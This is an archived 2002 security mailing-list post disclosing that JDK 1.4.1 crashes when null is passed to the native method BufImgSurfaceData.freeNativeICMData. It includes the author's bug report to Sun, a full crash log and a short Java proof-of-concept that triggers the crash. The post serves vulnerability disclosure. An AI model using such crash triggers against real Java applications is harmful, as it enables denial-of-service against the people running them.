OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Marc Schoenefeld (marc.schoenefeld_at_uni-muenster.de)
Date: Sat Sep 28 2002 - 03:44:44 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    there are some more possible JVM crashes that can be
    caused by native injection in JDK 1.4.1. Obviously
    Sun still forgot to check for null pointers.

    The threat is the possibility to execute these
    commands. For instance if you put a null value in
    an api call like
    BufImgSurfaceData.freeNativeICMData(null)
    the freshly released jvm 1.4.1 crashes.
    This behaviour was found on the win32 and linux
    JDK distribution. Other distributions might be vulnerable
    too.

    Although the technique how to find these bugs was
    described at my blackhat talk (USA 2002)
    SUN still delivers new JDK versions with
    these now well detectable bugs.

    My talk and slides can be downloaded at
    www.illegalaccess.org

    Sincerely
    Marc

    Here is one of the bug reports send to SUN:

    ----------------- Original Bug Report-------------------

    category : java
    release : 1.4.1
    subcategory : native_interface
    type : bug
    synopsis : JVM-Crash with BufImgSurfaceData
    description : FULL PRODUCT VERSION :
    java version "1.4.1"
    Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.1-b21)
    Java HotSpot(TM) Client VM (build 1.4.1-b21, mixed mode)

    FULL OPERATING SYSTEM VERSION :
    Microsoft Windows 2000 [Version 5.00.2195]an

    A DESCRIPTION OF THE PROBLEM :
    Crash with API-Call, found by Nativ3finder

    EXPECTED VERSUS ACTUAL BEHAVIOR :
    Expected: Null Pointer Exception
    Really Happenend: JVM crash during runtime

    ERROR MESSAGES/STACK TRACES THAT OCCUR :
    Unexpected Signal : EXCEPTION_ACCESS_VIOLATION occurred at PC=0x6D3A5DFB
    Function=[Unknown.]
    Library=c:\java\1.4.1\01\jre\bin\client\jvm.dll
    ~
    NOTE: We are unable to locate the function name symbol for the error
          just occurred. Please refer to release documentation for possible
          reason and solutions.
    "Java14CrashBufImgSurfaceData.java" 13 lines, 499 characters

    Current Java thread:
            at sun.awt.image.BufImgSurfaceData.freeNativeICMData(Native Method)
            at Java14CrashBufImgSurfaceData.main
    (Java14CrashBufImgSurfaceData.java:1
    1)

    Dynamic libraries:
    0x00400000 - 0x00406000 c:\java\1.4.1\01\bin\java.exe
    0x77880000 - 0x77901000 C:\WINNT\System32\ntdll.dll
    0x77DA0000 - 0x77DFC000 C:\WINNT\system32\ADVAPI32.dll
    0x77E70000 - 0x77F32000 C:\WINNT\system32\KERNEL32.DLL
    0x77D30000 - 0x77DA0000 C:\WINNT\system32\RPCRT4.DLL
    0x78000000 - 0x78046000 C:\WINNT\system32\MSVCRT.dll
    0x6D330000 - 0x6D45C000 c:\java\1.4.1\01\jre\bin\client\jvm.dll
    0x77E00000 - 0x77E64000 C:\WINNT\system32\USER32.dll
    0x77F40000 - 0x77F7C000 C:\WINNT\system32\GDI32.DLL
    0x77540000 - 0x77571000 C:\WINNT\System32\WINMM.dll
    0x6D1D0000 - 0x6D1D7000 c:\java\1.4.1\01\jre\bin\hpi.dll
    0x6D300000 - 0x6D30D000 c:\java\1.4.1\01\jre\bin\verify.dll
    0x6D210000 - 0x6D229000 c:\java\1.4.1\01\jre\bin\java.dll
    0x6D320000 - 0x6D32D000 c:\java\1.4.1\01\jre\bin\zip.dll
    0x6D000000 - 0x6D0FA000 C:\java\1.4.1\01\jre\bin\awt.dll
    0x777F0000 - 0x7780D000 C:\WINNT\System32\WINSPOOL.DRV
    0x75DF0000 - 0x75E0A000 C:\WINNT\System32\IMM32.dll
    0x77A40000 - 0x77B36000 C:\WINNT\system32\ole32.dll
    0x6D180000 - 0x6D1D0000 C:\java\1.4.1\01\jre\bin\fontmanager.dll
    0x51000000 - 0x51044000 C:\WINNT\System32\ddraw.dll
    0x72810000 - 0x72816000 C:\WINNT\System32\DCIMAN32.dll
    0x72D90000 - 0x72E03000 C:\WINNT\System32\D3DIM.DLL
    0x6E330000 - 0x6E336000 C:\WINNT\System32\INDICDLL.dll
    0x77910000 - 0x77933000 C:\WINNT\system32\imagehlp.dll
    0x72970000 - 0x7299D000 C:\WINNT\system32\DBGHELP.dll
    0x68F30000 - 0x68F3B000 C:\WINNT\System32\PSAPI.DLL

    Local Time = Tue Sep 24 00:33:34 2002
    Elapsed Time = 1
    #
    # HotSpot Virtual Machine Error : EXCEPTION_ACCESS_VIOLATION
    # Error ID : 4F530E43505002E6
    # Please report this error at
    # http://java.sun.com/cgi-bin/bugreport.cgi
    #
    # Java VM: Java HotSpot(TM) Client VM (1.4.1-b21 mixed mode)
    #
    # An error report file has been saved as hs_err_pid2252.log.
    # Please refer to the file for further information.

    REPRODUCIBILITY :
    This bug can be reproduced always.

    ---------- BEGIN SOURCE ----------
    import sun.awt.image.BufImgSurfaceData;
    import java.awt.*;
    import java.awt.image.*;
    import sun.java2d.*;

    public class Java14CrashBufImgSurfaceData {
        public static void main(String [] args) {
            Frame F = new Frame(); // to load the awt native libs , otherwise
            // the next statement complains about missing native ids
            BufImgSurfaceData.freeNativeICMData(null);
        }
    }

    ---------- END SOURCE ----------

    CUSTOMER WORKAROUND :
    Don't use BufImgSurfaceData
    workaround :
    suggested_val :
    cust_name : Marc Schoenefeld
    cust_email : marc_________.de
    jdcid :
    keyword : webbug
    company : Me
    hardware : x86
    OSversion : win_xp
    bugtraqID : 0
    dateCreated : 2002-09-23 16:38:24.0
    dateEvaluated : 2002-09-24 09:56:59.644 

    --
-- Mahatma Gandhi--
First they ignore you
Then they laugh at you
Then they fight you
Then you win
-- Mahatma Gandhi--

    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer